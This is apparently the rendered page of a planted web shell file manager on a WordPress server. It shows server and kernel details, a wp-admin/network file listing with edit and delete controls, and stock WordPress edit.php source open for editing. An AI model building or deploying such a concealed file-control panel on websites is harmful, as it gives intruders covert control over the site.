[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-admin
/
network
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 about.php
245 B
SET
[ EDIT ]
|
[ DEL ]
📄 admin.php
1,024 B
SET
[ EDIT ]
|
[ DEL ]
📄 contribute.php
255 B
SET
[ EDIT ]
|
[ DEL ]
📄 credits.php
249 B
SET
[ EDIT ]
|
[ DEL ]
📄 edit.php
908 B
SET
[ EDIT ]
|
[ DEL ]
📄 freedoms.php
251 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
2,911 B
SET
[ EDIT ]
|
[ DEL ]
📄 menu.php
4,798 B
SET
[ EDIT ]
|
[ DEL ]
📄 plugin-editor.php
266 B
SET
[ EDIT ]
|
[ DEL ]
📄 plugin-install.php
377 B
SET
[ EDIT ]
|
[ DEL ]
📄 plugins.php
249 B
SET
[ EDIT ]
|
[ DEL ]
📄 privacy.php
249 B
SET
[ EDIT ]
|
[ DEL ]
📄 profile.php
254 B
SET
[ EDIT ]
|
[ DEL ]
📄 settings.php
22,027 B
SET
[ EDIT ]
|
[ DEL ]
📄 setup.php
247 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-info.php
7,777 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-new.php
9,601 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-settings.php
5,599 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-themes.php
6,875 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-users.php
11,802 B
SET
[ EDIT ]
|
[ DEL ]
📄 sites.php
14,536 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-editor.php
264 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-install.php
374 B
SET
[ EDIT ]
|
[ DEL ]
📄 themes.php
15,989 B
SET
[ EDIT ]
|
[ DEL ]
📄 update-core.php
253 B
SET
[ EDIT ]
|
[ DEL ]
📄 update.php
450 B
SET
[ EDIT ]
|
[ DEL ]
📄 upgrade.php
4,944 B
SET
[ EDIT ]
|
[ DEL ]
📄 user-edit.php
253 B
SET
[ EDIT ]
|
[ DEL ]
📄 user-new.php
5,228 B
SET
[ EDIT ]
|
[ DEL ]
📄 users.php
9,494 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: edit.php
<?php /** * Action handler for Multisite administration panels. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $action = ( isset( $_GET['action'] ) ) ? $_GET['action'] : ''; if ( empty( $action ) ) { wp_redirect( network_admin_url() ); exit; } /** * Fires just before the action handler in several Network Admin screens. * * This hook fires on multiple screens in the Multisite Network Admin, * including Users, Network Settings, and Site Settings. * * @since 3.0.0 */ do_action( 'wpmuadminedit' ); /** * Fires the requested handler action. * * The dynamic portion of the hook name, `$action`, refers to the name * of the requested action derived from the `GET` request. * * @since 3.1.0 */ do_action( "network_admin_edit_{$action}" ); wp_redirect( network_admin_url() ); exit;